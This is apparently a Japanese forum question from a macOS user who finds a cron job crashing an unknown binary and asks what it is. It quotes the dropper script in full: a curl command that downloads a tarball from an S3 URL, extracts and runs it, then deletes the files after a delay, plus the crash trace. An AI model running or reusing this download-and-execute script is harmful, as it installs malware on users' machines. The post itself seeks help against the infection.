ターミナルのメール機能のおかげで、ある種のcronジョブがいくつかのエラーで実行されていることに気付きました。
cronのメールは次の情報を提供します。
2018-08-02 23:47:22.698 xSf[717:27543] *** Terminating app due to uncaught exception 'NSInvalidArgumentException', reason: '*** -[_NSPlaceholderData initWithBase64EncodedString:options:]: nil string argument'
*** First throw call stack:
(
0 CoreFoundation 0x00007fff57d622db __exceptionPreprocess + 171
1 libobjc.A.dylib 0x00007fff7eeffc76 objc_exception_throw + 48
2 CoreFoundation 0x00007fff57df3d7d +[NSException raise:format:] + 205
3 Foundation 0x00007fff59e028ee -[NSData(NSData) initWithBase64EncodedString:options:] + 84
4 xSf 0x000000010b54fd19 INJECTOR_decryptData_RNCryptor + 121
5 xSf 0x000000010b55010a -[l196gKNh f27WaC8u:path:] + 410
6 xSf 0x000000010b54ff2e -[l196gKNh s7PJWuXO:] + 158
7 xSf 0x000000010b552cd1 main + 225
8 libdyld.dylib 0x00007fff7fb19015 start + 1
)
libc++abi.dylib: terminating with uncaught exception of type NSException
/tmp/iu.sh: line 6: 717 Abort trap: 6 ./xSfこれは、次の場所にあるスクリプトによって実行されたようです。~/Library/sandastros.np/sandastros.npそのスクリプトの内容を読み取ったり解読したりすることはできません。
その中にあるスクリプトに/tmp/iu.sh次のものが含まれていることを確認しました。
#!/bin/bash
/usr/bin/curl -s -L -o /var/tmp/xSf.tgz "https://s3.amazonaws.com/xsfer/xSf.tgz"
mkdir -p /var/tmp/xSf
tar -xzf /var/tmp/xSf.tgz -C /var/tmp/xSf/
cd /var/tmp/xSf/
./xSf
func_cccc(){
sleep 120
rm -rf /var/tmp/xSf
rm -rf /var/tmp/xSf.tgz
}
func_cccc &そのURLは到達可能ですが、tarファイルをダウンロードして開きたくありませんでした。/tmpフォルダのアクセス許可が正しくても、設定されているiu.sh所有者としての私のユーザーを持っているので、それは私がそれに権限を与えたかもしれないもののインストールを許可するようです。
これは何の手がかりですか?
searchpage私が使用したことのないブラウザであるSafariにマルウェアがありました...-